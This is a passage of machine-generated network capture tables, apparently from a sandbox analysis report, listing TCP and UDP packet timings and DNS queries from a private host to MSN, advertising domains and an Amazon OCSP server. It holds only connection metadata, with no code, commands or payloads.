                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453291893 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453315020 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453321934 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453372002 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453805923 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453877926 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453887939 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453975916 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.453984022 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.454030037 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.486917973 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.487308025 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.487374067 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:53.545480013 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:53.545569897 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:53.743567944 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:53.743632078 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.082253933 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.083863974 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.303678989 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.303757906 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.540920019 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.541038036 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.743609905 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:54.743674994 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.185956955 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.186455965 CEST4982380192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.212642908 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.212699890 CEST804982313.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.212755919 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.212781906 CEST4982380192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.213751078 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.231343985 CEST804982313.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.231388092 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.231458902 CEST4982380192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.233546972 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.239798069 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.288043022 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.288153887 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:01.241494894 CEST804982313.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:01.241666079 CEST4982380192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.043339968 CEST4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.043382883 CEST4988880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069555998 CEST804988713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069580078 CEST804988813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069740057 CEST4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069812059 CEST4988880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069914103 CEST4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.081897974 CEST804988813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.082005024 CEST4988880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.084902048 CEST804988713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.085006952 CEST4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.095983028 CEST804988713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.362699986 CEST804988713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.362812042 CEST4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764085054 CEST49780443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764328003 CEST4434978087.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764338970 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764354944 CEST49780443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764389992 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764556885 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764576912 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764678955 CEST49780443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.764904022 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.765139103 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.765145063 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:24.765500069 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.240717888 CEST4982380192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.241213083 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.267044067 CEST804982313.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.267237902 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.532047033 CEST804982413.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:28.532167912 CEST4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.098377943 CEST804988813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.098656893 CEST4988880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.531127930 CEST4993880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.531609058 CEST4993780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.557374001 CEST804993813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.557729959 CEST4993880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.557766914 CEST804993713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.557956934 CEST4993880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.559156895 CEST4993780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.572809935 CEST804993813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.573060989 CEST4993880192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.582146883 CEST804993713.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.584844112 CEST804993813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.587729931 CEST4993780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.630445957 CEST804993813.225.29.191192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.630678892 CEST4993880192.168.2.713.225.29.191

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:33.516083002 CEST5856253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:33.548983097 CEST53585628.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.241605997 CEST5659053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.268162966 CEST53565908.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.620774984 CEST6050153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.648479939 CEST53605018.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:36.215567112 CEST5377553192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:36.248364925 CEST53537758.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:36.250138044 CEST5183753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:36.283432007 CEST53518378.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:37.985785007 CEST5541153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.029557943 CEST53554118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.445050001 CEST6366853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.486430883 CEST53636688.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.524367094 CEST5464053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.614166021 CEST53546408.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.974555969 CEST5873953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.015870094 CEST53587398.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.431267977 CEST6033853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.438072920 CEST5871753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.468822956 CEST53603388.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.474426985 CEST53587178.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:40.251669884 CEST5976253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:40.286279917 CEST53597628.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.147679090 CEST5432953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.183732033 CEST53543298.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.998584032 CEST5805253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.033147097 CEST53580528.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.285140038 CEST5400853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.313369036 CEST53540088.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.892303944 CEST5945153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.929163933 CEST53594518.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.237211943 CEST5291453192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.254807949 CEST6456953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.264920950 CEST53529148.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.282623053 CEST53645698.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:51.449603081 CEST5281653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:51.497874022 CEST53528168.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:57.215043068 CEST5078153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:57.257671118 CEST53507818.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:03.666455984 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:03.693216085 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:04.789565086 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:04.815498114 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:05.495837927 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:05.523277998 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:05.808351040 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:05.835448980 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:06.042996883 CEST4995853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:06.069534063 CEST53499588.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:06.550276041 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:06.575799942 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:07.558320045 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:07.584140062 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:07.812056065 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:07.839993954 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:09.564910889 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:09.589966059 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:11.846787930 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:11.872541904 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.624316931 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.651222944 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.811177015 CEST5086053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.837502003 CEST53508608.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.889964104 CEST5045253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:13.918382883 CEST53504528.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.026415110 CEST5973053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.067151070 CEST53597308.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:34.378722906 CEST5931053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:34.426736116 CEST53593108.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:46.326136112 CEST5191953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:46.339672089 CEST6429653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:46.365149021 CEST53519198.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:46.380896091 CEST53642968.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:47.437076092 CEST5668053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:47.472217083 CEST53566808.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:47.520545006 CEST5882053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:47.563492060 CEST53588208.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:49.058530092 CEST6098353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:49.072633028 CEST4924753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:49.086833000 CEST53609838.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:49.104980946 CEST53492478.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:51.814459085 CEST5228653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:51.840553999 CEST53522868.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:52.399296045 CEST5606453192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:52.435664892 CEST53560648.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:55.954329967 CEST6374453192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:55.995441914 CEST53637448.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:57.463607073 CEST6145753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:57.498812914 CEST53614578.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:59.881942034 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:59.907066107 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:00.928602934 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:00.955346107 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:01.975080967 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:02.002774000 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:02.937577009 CEST6059953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:02.970938921 CEST53605998.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:03.400063038 CEST5957153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:03.435964108 CEST53595718.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:04.020484924 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:04.047669888 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:06.694776058 CEST5268953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:06.734076977 CEST53526898.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:07.722378016 CEST5029053192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:07.750015020 CEST53502908.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:08.033319950 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:08.058444977 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:09.723238945 CEST6042753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:09.758032084 CEST53604278.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.006130934 CEST5620953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.039644957 CEST53562098.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:15.779016018 CEST5958253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:15.840677977 CEST53595828.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:16.267604113 CEST6094953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:16.303177118 CEST53609498.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:16.789525986 CEST5854253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:16.857801914 CEST53585428.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.198149920 CEST5917953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.243729115 CEST53591798.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.332115889 CEST6092753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.365434885 CEST53609278.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.749300003 CEST5785453192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.787192106 CEST53578548.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.122560978 CEST6202653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.158761978 CEST53620268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.935151100 CEST5945353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.960432053 CEST53594538.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.434587002 CEST6246853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.470165968 CEST53624688.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.948113918 CEST5256353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.980835915 CEST5472153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.981103897 CEST53525638.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.015856981 CEST53547218.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.349188089 CEST6282653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.381629944 CEST53628268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:23.877279997 CEST6204653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:23.910409927 CEST53620468.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:31.496931076 CEST5122353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:31.529613018 CEST53512238.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.038230896 CEST6390853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST53639088.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:42.676321030 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:42.704711914 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.679935932 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.717204094 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:44.695359945 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:44.724488974 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:46.695827961 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:46.726485968 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:50.702300072 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:50.729746103 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.486399889 CEST6021253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST53602128.8.8.8192.168.2.7

                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:35.620774984 CEST192.168.2.78.8.8.80x372bStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:37.985785007 CEST192.168.2.78.8.8.80x548bStandard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.445050001 CEST192.168.2.78.8.8.80xaeceStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.524367094 CEST192.168.2.78.8.8.80x396fStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.974555969 CEST192.168.2.78.8.8.80xb465Standard query (0)btloader.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.431267977 CEST192.168.2.78.8.8.80x406aStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.438072920 CEST192.168.2.78.8.8.80x562eStandard query (0)ad-delivery.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:40.251669884 CEST192.168.2.78.8.8.80x72a3Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.147679090 CEST192.168.2.78.8.8.80x9784Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:41.998584032 CEST192.168.2.78.8.8.80x5260Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:42.285140038 CEST192.168.2.78.8.8.80x836dStandard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.237211943 CEST192.168.2.78.8.8.80xabbStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.254807949 CEST192.168.2.78.8.8.80xceceStandard query (0)s.yimg.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:12:31.026415110 CEST192.168.2.78.8.8.80xa20dStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.006130934 CEST192.168.2.78.8.8.80x22deStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.038230896 CEST192.168.2.78.8.8.80xb3a2Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.486399889 CEST192.168.2.78.8.8.80x8f1dStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)

